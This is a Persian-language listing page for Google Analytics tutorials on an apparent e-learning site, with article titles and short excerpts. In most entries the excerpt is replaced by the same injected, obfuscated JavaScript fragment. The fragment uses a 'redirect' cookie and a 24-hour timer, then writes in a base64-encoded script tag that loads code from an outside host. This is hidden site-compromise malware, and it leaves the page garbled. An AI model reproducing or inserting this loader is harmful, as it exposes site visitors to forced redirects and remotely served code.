آموزش گوگل آنالیتیکس (google analytics)

آموزش گوگل آنالیتیکس

در این آموزش گوگل آنالیتیکس هرآنچه که نیار دارید تا با این ابزار قدرتمند و رایگان بصورت حرفه‌ای کار کنید وجود دارد.

اگر به تازگی پا به دنیای دیجیتال مارکتینگ گذاشته باشید، ما به شما خواهیم گفت که چطور از گوگل آنالیتیکس برای تجزیه تحلیل و اندازه گیری اهداف بازاریابی خود استفاده کنید.

و اگر شما یک دیجیتال مارکتر حرفه‌ای باشید، ما نکات حرفه‌ای، تاکتیک و استراتژی‌هایی را به شما خواهیم گفت که از آن می‌توانید برای بهبود کمپین‌های بازاریابی و همچنین رشد و بهبود کسب و کارتان از آن استفاده کنید.

فهرست محتوای آموزش گوگل آنالیتیکس

آیا engaged session در گوگل آنالیتیکس 4، همان بانس ریت است؟

در یک دهه گذشته، بسیاری از تحلیلگران با استفاده از معیاری به بانس ریت (bounce rate) در گوگل آنالیتیکس، متوجه این موضوع شده اند که کاربران چه طور با وب سایت درگیر بوده اند ؛ اما متاسفانه یا خوشبختانه، در google analytics  جدید، خبری از نرخ پرش وجود ندارد و به جای آن از engaged […]

هفت ویژگی مهم گوگل آنالیتیکس که باعث افزایش عملکرد می شود.

گوگل آنالیتیکس برای ردیابی و تجزیه و تحلیل عملکرد وب سایت استفاده می شود. با این حال، برخی از ویژگی های گوگل آنالیتیکس هستند که کمتر به آنها پرداخته شده است ولی باعث بهبود و افزایش عملکرد وب سایت نیز می شوتد. گوگل آنالیتیکس، یک محصول تجزیه و تحلیل وب از طرف گوگل است که […]

آموزش (regex)Regular Expressions | عبارات با قاعده در گوگل آنالیتیکس

امروز در ویکی دمی درمورد یکی از تخصصی ترین موضوعات گوگل آنالیتیکس به نام Regular Expression صحبت خواهیم کرد و آن را به صورت کامل به شما آموزش می دهیم. اگر با یک بار مطالعه آموزش regex حس کردید که هنوز بر موضوع Regular Expressions یا همان عبارات با قاعده تسلط ندارید، اصلاً نگران نباشید […]

گزارشات Site Content در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آشنایی با UTM و بررسی Campain در گوگل آنالیتیکس

ویدئویی که در حال مشاهده آن هستید بخشی از دوره ی آموزش گوگل آنالیتیکس در آکادمی مهارت آموزی آنلاین ویکی دمی است. برای ثبت نام از لینک مقابل استفاده کنید. رایگان ثبت نام کنیدا استفاده از گزارشات Refferal توانستیم سایت هایی که برای ما ترافیک ارسال کرده اند را شناسایی کنیم. حقیقت این است که گوگل […]

آشنایی با ترافیک های Refferal در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آشنایی با Source و Medium در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آشنایی با کانال های ترافیکی در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آشنایی با بخش Acquisition در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

گزارشات موبایل (Mobile) در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

گزارشات تکنولوژی (Technology) در گوگل آنالیتیکس

  گزارش های بخش تکنولوژی اطلاعات زیادی در مورد طراحی و ساخت یک سایت و همچنین بهینه آن در اختیار ما قرار می دهد. خوب است وقتی در حال طراحی سایتمان هستیم از اطلاعات بخش تکنولوژی گوگل آنالیتیکس استفاده کنیم تا طراحی سایت جدید را طوری انجام دهیم که کاربران هنگام گردش در سایت با […]

گزارشات جغرافیایی (Geographic location) در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

سن و جنسیت کاربران (Demographics) در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

ساخت گروه کاربران جدید و اعمال آن بر گزارشات گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آشنایی مقدماتی با گروه بندی کاربران در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آشنایی با Metrics و Dimension در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آموزش Acquisition در گوگل آنالیتیکس

Rate this post

تعریف event در گوگل آنالیتیکس | آموزش گام به گام ایجاد event

همانطور که در مقاله ی ایجاد goal در آنالیتیکس به شما قول داده بودیم امروز میخواهیم در مورد ایجاد و تعریف ایونت event در گوگل آنالیتیکس و گوگل تگ منیجر صحبت کنیم. اگر در ابتدای راه یادگیری گوگل آنالیتیکس هستید، بهتره ابتدا مقاله آموزش کامل گوگل آنالیتیکس را مطالعه کنید تا با مفاهیم آن بیشتر […]

ایجاد goal در گوگل آنالیتیکس | آموزش جامع تعیین هدف در گوگل آنالیتیکس

2.8 / 5 ( 6 امتیاز )

آموزش Behavior در گوگل آنالیتیکس

در مقاله امروز قصد داریم Behavior در آنالیتیکس را برای شما به صورت جامع توضیح بدیم. Behavior یا همان تحلیل رفتار کاربر یکی از مهمترین بخش های google analytics است که بدون تسلط به آن نمی توان تحلیل درستی از اطلاعاتی که گوگل آنالیتیکس به ما میده داشته باشیم. مهم ترین هدف هر کسب و […]

تحلیل کاربران در گوگل آنالیتیکس (‌Audience)

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آشنایی گزارش Overview بخش Audience در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

نوشتن یادداشت و نکته در گزارشات گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آشنایی با فیلترهای پیشرفته در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آشنایی با فیلترهای داخلی ساده در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آشنایی با انواع نمودار و گزارش در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

فیلم آموزش تجزیه و تحلیل در گوگل آنالیتیکس

فیلم آموزش تجزیه و تحلیل در گوگل آنالیتیکس اولین فیلم از دوره آموزش مقدماتی گوگل آنالیتیکس است که ما در ویکی دمی به شکل کاملا رایگان در اختیار شما قرار دادیم. امیدواریم نهایت استفاده را از این دوره آموزشی ببرید.     توضیحات ویدیو: به جلسه اول دوره ی آموزش مقدماتی گوگل آنالیتیکس خوش آمدید. […]

آشنایی با Graph در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آشنایی با گزارشات در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آشنایی با منوهای گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

آشنایی با Property و View در گوگل آنالیتیکس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

فیلم آموزش نحوه کار گوگل آنالیتیکس

برای تسلط کامل به موضوعات مختلف گوگل آنالیتیکس بهتره به بخش آموزش گوگل آنالیتیکس در ویکی دمی مراجعه کنید. ما در این بخش، تمامی موضوعاتی برای تسلط شما به نحوه‌کار با گوگل آنالیتیکس را قرار داده ایم. برای مشاهده کل دوره وارد صفحه دوره آموزش گوگل آنالیتیکس بشید و سایر آموزش ها را مشاهده کنید. […]

آموزش نصب گوگل آنالیتیکس در وردپرس

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Rate this post

دوره گوگل آنالیتیکس

نمونه تصاویر دوره آموزش گوگل آنالیتیکس

نمونه تدریس دوره گوگل آنالیتیکس (google analytics)

نمونه تصاویر دوره آموزش گوگل آنالیتیکس

تعریف event در آنالیتیکس
تعریف event در آنالیتیکس

گوگل آنالیتیکس چیست؟

